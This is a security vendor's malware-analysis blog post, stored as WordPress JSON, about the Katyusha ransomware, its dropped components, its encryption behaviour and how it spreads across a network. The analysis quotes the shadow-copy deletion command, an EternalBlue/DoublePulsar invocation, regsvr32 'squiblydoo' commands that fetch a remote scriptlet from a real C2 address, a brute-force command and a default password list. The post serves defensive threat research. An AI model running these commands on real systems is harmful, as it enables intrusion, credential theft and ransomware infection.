{"id":87098,"date":"2018-12-14T16:29:58","date_gmt":"2018-12-14T10:59:58","guid":{"rendered":"https:\/\/blogs_admin.quickheal.com\/?p=87098"},"modified":"2018-12-14T17:47:57","modified_gmt":"2018-12-14T12:17:57","slug":"sophisticated-ransomware-katyusha","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/sophisticated-ransomware-katyusha\/","title":{"rendered":"Sophisticated Ransomware : \u201cKatyusha\u201d"},"content":{"rendered":"<p>For\u00a0several months, Quick Heal Security Labs has been observing an increase in ransomware, we have found one more interesting ransomware which encrypts files and adds extension \u201c.katyusha\u201d and demands\u00a0for an amount of 0.5 btc within three days and threatens\u00a0to release the data to public download if the ransom is not paid. Malware is bundled with many components including using \u201c<strong><b>Double pulsar<\/b><\/strong>\u201d and \u201c<strong><b>Eternal blue<\/b><\/strong>\u201d exploit which is used to get spread over the network. Also, uses a unique attack technique called \u201c<strong><b>squiblydoo<\/b><\/strong>\u201d to \u00a0spread over the network. The infection vector for this ransomware is still not confirmed, but on the basis of attribution this ransomware may enter the system via spear phishing, malvertising, spam mail, SMB exploit etc.<\/p>\n<p><strong><b>Technical Analysis<\/b><\/strong>:<\/p>\n<p>This malware is packed with MPRESS(v2.19) and present on victim\u2019s system with the name \u201c<strong><b>katyusha.exe<\/b><\/strong>\u201d at \u201c%temp%\u201d. It contains three components. On execution it drops them into C:\\Windows\\Temp and starts their execution:<\/p>\n<ul>\n<li>Svchost0.bat<\/li>\n<li>Zkts.exe<\/li>\n<li>Ktsi.exe<\/li>\n<\/ul>\n<p>Katyusha checks for following files on the system to determine whether the system is already infected or not.<\/p>\n<p style=\"text-align: center\"><strong><b>\u201cC:\\_how_to_decrypt_you_files.txt\u201d<\/b><\/strong><\/p>\n<p style=\"text-align: center\"><strong><b>\u201cC:\\ProgramData\\_how_to_decrypt_you_files.txt\u201d<\/b><\/strong><\/p>\n<p>If a system is already infected, Katyusha creates a batch file (svchost0.bat) which contains code as shown in Fig.1. to delete self-copy and terminate itself. If the system is not infected then it drops zkts.exe and ktsi.exe and executes them.<\/p>\n<figure id=\"attachment_87099\" aria-describedby=\"caption-attachment-87099\" style=\"width: 608px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87099\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig1-svchost_batchfile.png\" alt=\"\" width=\"608\" height=\"100\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig1-svchost_batchfile.png 608w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig1-svchost_batchfile-300x49.png 300w\" sizes=\"(max-width: 608px) 100vw, 608px\" \/><figcaption id=\"caption-attachment-87099\" class=\"wp-caption-text\">Fig 1: Content of Svchost0.bat<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><strong><b>Zkts.exe<\/b><\/strong>:<\/p>\n<p>This file is 7zip compressed executable and main component which contains multiple sub-modules like network spreading module, password stealing module, etc.<\/p>\n<p>On the execution of zkts.exe, it extracts components in \u201c<strong><b>C:\\Windows\\Temp<\/b><\/strong>\u201d such as Mimikatz, katyusha.dll, eternal blue exploit, etc. those are later used by Katyusha to perform an activity.<\/p>\n<figure id=\"attachment_87101\" aria-describedby=\"caption-attachment-87101\" style=\"width: 1101px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87101\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1.png\" alt=\"\" width=\"1101\" height=\"332\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1.png 1101w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1-300x90.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1-768x232.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1-650x196.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1-789x238.png 789w\" sizes=\"(max-width: 1101px) 100vw, 1101px\" \/><figcaption id=\"caption-attachment-87101\" class=\"wp-caption-text\">Fig 2.Files Dropped by zkts.exe<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><strong><b>Ktsi.exe <\/b><\/strong>(Encryptor):<\/p>\n<p>This is another main component which is also MPRESS packed file. It is mainly used for file encryption and to drop ransom note on the victim\u2019s system. This process is started independently by main payload (katyusha.exe) as shown in Fig 3.<\/p>\n<figure id=\"attachment_87102\" aria-describedby=\"caption-attachment-87102\" style=\"width: 685px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87102\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig3-createProcess_KTSI.png\" alt=\"\" width=\"685\" height=\"158\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig3-createProcess_KTSI.png 685w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig3-createProcess_KTSI-300x69.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig3-createProcess_KTSI-650x150.png 650w\" sizes=\"(max-width: 685px) 100vw, 685px\" \/><figcaption id=\"caption-attachment-87102\" class=\"wp-caption-text\">Fig 3: Call to CreateProcess() for ktsi.exe<\/figcaption><\/figure>\n<p>On the execution of ktsi.exe, it firstly kills list of following tasks to release handles of files which are locked by relevant processes to encrypt(such as db files, etc) as shown in Fig 4.<\/p>\n<p>To encrypt database related files successfully, ktsi kills processes which are related to database applications. Below is the list of processes hard-coded in malware:<\/p>\n<table width=\"391\">\n<tbody>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">mysqld.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">\u00a0httpd.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\">\u00a0sqlsevr.exe<\/td>\n<\/tr>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">sqlwriter.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">\u00a0w3wp.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\">\u00a0sqlagent.exe<\/td>\n<\/tr>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">fdhost.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">\u00a0fdlauncher.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\">\u00a0reportingservicesservice.exe<\/td>\n<\/tr>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">omtsreco.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">\u00a0\u00a0tnslsnr.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\">\u00a0\u00a0oracle.exe<\/td>\n<\/tr>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">emagent.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">\u00a0mysqld-nt.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div><\/div>\n<div><\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87103\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy.png\" alt=\"\" width=\"1060\" height=\"251\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy.png 1060w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy-300x71.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy-768x182.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy-650x154.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy-789x187.png 789w\" sizes=\"(max-width: 1060px) 100vw, 1060px\" \/><\/div>\n<p>Fig 4: Taskkill command execution.<\/p>\n<p>After the taskkill operation malware drops ransom note in html and txt format at below path to make it visible for all users at system startup,<\/p>\n<p>\u201cC:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\u201d<\/p>\n<p style=\"text-align: center\">_how_to_decrypt_you_files.txt<\/p>\n<p style=\"text-align: center\">_how_to_decrypt_you_files.html<\/p>\n<p>In \u201cC:\\ProgramData\u201d and at the root of C drive(C:\\) drop only ransom note as &#8220;_how_to_decrypt_you_files.txt&#8221;.<\/p>\n<figure id=\"attachment_87115\" aria-describedby=\"caption-attachment-87115\" style=\"width: 852px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87115\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote-.png\" alt=\"\" width=\"852\" height=\"551\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote-.png 852w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote--300x194.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote--768x497.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote--603x390.png 603w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote--789x510.png 789w\" sizes=\"(max-width: 852px) 100vw, 852px\" \/><figcaption id=\"caption-attachment-87115\" class=\"wp-caption-text\">Fig 5: Ransom Note<\/figcaption><\/figure>\n<p>Ktsi.exe also deletes shadow copy by executing the following command,<\/p>\n<p style=\"text-align: center\">\u201cvssadmin delete shadows \/all \/quiet\u201d<\/p>\n<figure id=\"attachment_87129\" aria-describedby=\"caption-attachment-87129\" style=\"width: 1023px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87129\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1.png\" alt=\"\" width=\"1023\" height=\"42\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1.png 1023w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1-300x12.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1-768x32.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1-650x27.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1-789x32.png 789w\" sizes=\"(max-width: 1023px) 100vw, 1023px\" \/><figcaption id=\"caption-attachment-87129\" class=\"wp-caption-text\">Fig 6: delete shadow copy<\/figcaption><\/figure>\n<p>After all these tasks, ktsi.exe starts file encryption (RSA) with the help of standard encryption method of <a href=\"https:\/\/wiki.openssl.org\/index.php\/Cryptogams_AES\"><u>CRYPTOGAMS<\/u><\/a>. Signatures related to this algorithm are found in a file, as shown in Fig 7.<\/p>\n<figure id=\"attachment_87106\" aria-describedby=\"caption-attachment-87106\" style=\"width: 604px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87106\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig7-cryptgams.png\" alt=\"\" width=\"604\" height=\"113\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig7-cryptgams.png 604w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig7-cryptgams-300x56.png 300w\" sizes=\"(max-width: 604px) 100vw, 604px\" \/><figcaption id=\"caption-attachment-87106\" class=\"wp-caption-text\">Fig 7: Cryptogams strings.<\/figcaption><\/figure>\n<p>It encrypts all extension files except the following one,<\/p>\n<figure id=\"attachment_87107\" aria-describedby=\"caption-attachment-87107\" style=\"width: 437px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87107\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig8-extensions.png\" alt=\"\" width=\"437\" height=\"14\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig8-extensions.png 437w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig8-extensions-300x10.png 300w\" sizes=\"(max-width: 437px) 100vw, 437px\" \/><figcaption id=\"caption-attachment-87107\" class=\"wp-caption-text\">Fig 8: Excluded Extensions from encryption.<\/figcaption><\/figure>\n<p>It also contains an exclusion list of files and folders (as shown in fig 9) if found these words in enumerated file path then it will exclude that path from encryption. To perform uninterrupted encryption, list contains names of few security products.<\/p>\n<figure id=\"attachment_87108\" aria-describedby=\"caption-attachment-87108\" style=\"width: 770px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87108\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders.png\" alt=\"\" width=\"770\" height=\"478\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders.png 770w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders-300x186.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders-768x477.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders-628x390.png 628w\" sizes=\"(max-width: 770px) 100vw, 770px\" \/><figcaption id=\"caption-attachment-87108\" class=\"wp-caption-text\">Fig 9: Exclusion list of Files and Folders.<\/figcaption><\/figure>\n<p><strong><b>Spreading Mechanism:<\/b><\/strong><\/p>\n<p>For network spreading, files extracted from zkts comes in role. Please refer Fig 2 for extracted components.<\/p>\n<p>m32.exe and m64.exe are Mimikatz tool which are used to fetch credentials from windows lsass.exe.<\/p>\n<p>Firstly, katyusha.exe determine whether the system is 64bit or 32bit using system call IsWow64Process (it returns a nonzero value if the system is 64 bit) and executes\u00a0Mimikatz according to system architecture.<\/p>\n<p>Mimikatz tool drops following files at <strong><b>\u201cC:\\Windows\\Temp\u201d<\/b><\/strong>\u00a0as output.<\/p>\n<p>&#8211; snamelog : \u00a0contains fetched usernames.<\/p>\n<p>&#8211; spasslog : \u00a0contains passwords for respective fetched usernames.<\/p>\n<figure id=\"attachment_87109\" aria-describedby=\"caption-attachment-87109\" style=\"width: 723px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87109\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig10-identify_system_32bit_64bit.png\" alt=\"\" width=\"723\" height=\"157\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig10-identify_system_32bit_64bit.png 723w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig10-identify_system_32bit_64bit-300x65.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig10-identify_system_32bit_64bit-650x141.png 650w\" sizes=\"(max-width: 723px) 100vw, 723px\" \/><figcaption id=\"caption-attachment-87109\" class=\"wp-caption-text\">Fig 10: Check to determine system type and start Mimikatz.<\/figcaption><\/figure>\n<p>After execution of mimikatz, katyusha.exe reads usernames \u00a0from snamelog and passwords from spasslog which are used to perform brute force attack into the network.<\/p>\n<p>Zkts.exe also drops svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll and svchostp.exe. These components are used to spread Katyusha over the network.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-87145\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/process_list.png\" alt=\"\" width=\"502\" height=\"128\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/process_list.png 502w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/process_list-300x76.png 300w\" sizes=\"(max-width: 502px) 100vw, 502px\" \/><\/p>\n<p>With the help of dropped eternal blue exploit and double pulsar, malware executes katyusha.dll on systems connected in network sequentially. For this katyusha.exe exploit SMB vulnerability with the help of the following command,<\/p>\n<p>\u201cC:\\windows\\temp\\&amp;svchostb.exe &#8211;TargetIp &lt;ip_address&gt; &amp; svchostbs.exe &#8211;OutConfig s &#8211;TargetPort 445 &#8211;Protocol SMB &#8211;Architecture x64 &#8211;Function RunDLL &#8211;DllPayload katyusha.dll &#8211;TargetIp &lt;ip_address&gt;\u201d<\/p>\n<figure id=\"attachment_87117\" aria-describedby=\"caption-attachment-87117\" style=\"width: 1439px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87117\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue.png\" alt=\"\" width=\"1439\" height=\"390\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue.png 1439w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue-300x81.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue-768x208.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue-650x176.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue-789x214.png 789w\" sizes=\"(max-width: 1439px) 100vw, 1439px\" \/><figcaption id=\"caption-attachment-87117\" class=\"wp-caption-text\">Fig 11: Execution of exploit on each system in the network.<\/figcaption><\/figure>\n<p>Katyusha.dll is payload file contains code to execute the following command,<\/p>\n<p>\u201cregsvr32 \/u \/s \/i:hxxp:\/\/86.106.102.147\/img\/katyusha.data scrobj.dll\u201d<\/p>\n<p>We can also find hard-coded strings of command in the file as shown in Fig 12.<\/p>\n<figure id=\"attachment_87111\" aria-describedby=\"caption-attachment-87111\" style=\"width: 656px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87111\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig12.png\" alt=\"\" width=\"656\" height=\"53\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig12.png 656w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig12-300x24.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig12-650x53.png 650w\" sizes=\"(max-width: 656px) 100vw, 656px\" \/><figcaption id=\"caption-attachment-87111\" class=\"wp-caption-text\">Fig 12: Command to download and execute the script from Url<\/figcaption><\/figure>\n<p>On execution of above regsvr32(Microsoft Register Server) command, it will download script (katyusha.data) from given Url and call unregister server with the parameter of regsvr32 (\/u). This will execute javascript code under the &lt;registration&gt; tag from downloaded scriptlet as shown in Fig 13. Script contains code to download katyusha.exe from given Url at <strong><b>\u201c%temp%\u201d<\/b><\/strong>\u00a0directory and execute it.<\/p>\n<figure id=\"attachment_87112\" aria-describedby=\"caption-attachment-87112\" style=\"width: 1021px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87112\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy.png\" alt=\"\" width=\"1021\" height=\"620\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy.png 1021w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy-300x182.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy-768x466.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy-642x390.png 642w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy-789x479.png 789w\" sizes=\"(max-width: 1021px) 100vw, 1021px\" \/><figcaption id=\"caption-attachment-87112\" class=\"wp-caption-text\">Fig 13: content of katyusha.data script<\/figcaption><\/figure>\n<figure id=\"attachment_87113\" aria-describedby=\"caption-attachment-87113\" style=\"width: 839px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87113\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_.png\" alt=\"\" width=\"839\" height=\"76\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_.png 839w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_-300x27.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_-768x70.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_-650x59.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_-789x71.png 789w\" sizes=\"(max-width: 839px) 100vw, 839px\" \/><figcaption id=\"caption-attachment-87113\" class=\"wp-caption-text\">Fig 14: Download request for script and payload in infected system.<\/figcaption><\/figure>\n<p>Such attack with regsvr32 commands to download scriptlet from C&amp;C and executes them is referred as <strong><b>\u201csquiblydoo\u201d<\/b><\/strong>.<\/p>\n<p>After above action, It also goes to brute force systems in the network with the help of Power Admin Tool(svchostp.exe). This tool is similar to sysinternals <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/psexec\"><u>PsExec<\/u><\/a>\u00a0tool, used to execute processes on remote system. This ransomware itself has the list of few usernames and passwords as given below, along with that it also uses usernames and passwords fetched by Mimikatz (snamelog and spasslog) for brute force attack.<\/p>\n<p><strong>Usernames:<\/strong><\/p>\n<p>Admin, administrator, +content of snamelog.<\/p>\n<p><strong>Passwords:<\/strong><\/p>\n<p>admin, 12345, chinachina203, 111, 123456, qwerty, test, abc123, 12345678, 0000, 1122, 1234, +contents of spasslog.<\/p>\n<p>In brute forcing, katyusha uses the following command,<\/p>\n<p>\u201cC:\\Windows\\temp\\svchostp.exe &lt;ip_address&gt; -u &lt;username&gt; -p &lt;password&gt; -n 10 -s regsvr32 \/u \/s \/i:https:\/\/86.106.102.147\/img\/katyusha.data scrobj.dll\u201d<\/p>\n<p>The above command simply executes regsvr32 utility with url as a parameter to download payload and performs activity as explained above for katyusha.dll.<\/p>\n<figure id=\"attachment_87114\" aria-describedby=\"caption-attachment-87114\" style=\"width: 1119px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87114\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy.png\" alt=\"\" width=\"1119\" height=\"357\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy.png 1119w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy-300x96.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy-768x245.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy-650x207.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy-789x252.png 789w\" sizes=\"(max-width: 1119px) 100vw, 1119px\" \/><figcaption id=\"caption-attachment-87114\" class=\"wp-caption-text\">Fig 15.Use of power admin tool (svchostp.exe)<\/figcaption><\/figure>\n<p><strong><b>IOC<\/b><\/strong>:<\/p>\n<p><strong>\u00a0 \u00a0MD5:\u00a0<\/strong>7f87db33980c0099739de40d1b725500<\/p>\n<p><strong>\u00a0 \u00a0Urls:<\/strong><\/p>\n<ol>\n<li>\u00a0hxxp:\/\/86.106.102.147\/img\/katyusha.data<\/li>\n<li>hxxp:\/\/86.106.102.147\/img\/katyusha.exe<\/li>\n<\/ol>\n<p><strong>\u00a0 \u00a0Bitcoin Wallet Address:<\/strong>\u00a0\u201c3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK\u201d<\/p>\n<p><strong><b>Conclusion<\/b><\/strong>:<\/p>\n<p>This year we have seen a spike in number of ransomware, they are using new ways to spread and also for encrypting the data. Now, most ransomware are bundled with exploit and tools like eternal blue, mimikatz for spreading over the network. We suggest users to avoid accessing suspicious Urls\/emails, use strong system credentials and keep their antivirus up-to-date.<\/p>\n<p><strong>Subject Matter Expert:<\/strong><\/p>\n<p>Pratik Pachpor | Quick Heal Security Labs<\/p>\n","protected":false},"excerpt":{"rendered":"<p>For\u00a0several months, Quick Heal Security Labs has been observing an increase in ransomware, we have found one more interesting ransomware which encrypts files and adds extension \u201c.katyusha\u201d and demands\u00a0for an amount of 0.5 btc within three days and threatens\u00a0to release the data to public download if the ransom is not paid. Malware is bundled with [&hellip;]<\/p>\n","protected":false},"author":51,"featured_media":87121,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[164,133,24,151,303,910,5,36,293,1395],"tags":[719,1634,1450,1631,1632,50,1633,40,38],"class_list":["post-87098","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-crime","category-hacker","category-malware","category-password","category-phishing","category-ransomware","category-security","category-security-patch","category-spam","category-vulnerability","tag-bitcoin","tag-double-pulsar","tag-eternalblue","tag-katyusha","tag-mimikatz","tag-ransomware","tag-squiblydoo","tag-trojan","tag-vulnerability"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87098"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/51"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=87098"}],"version-history":[{"count":28,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87098\/revisions"}],"predecessor-version":[{"id":87182,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87098\/revisions\/87182"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/87121"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=87098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=87098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=87098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}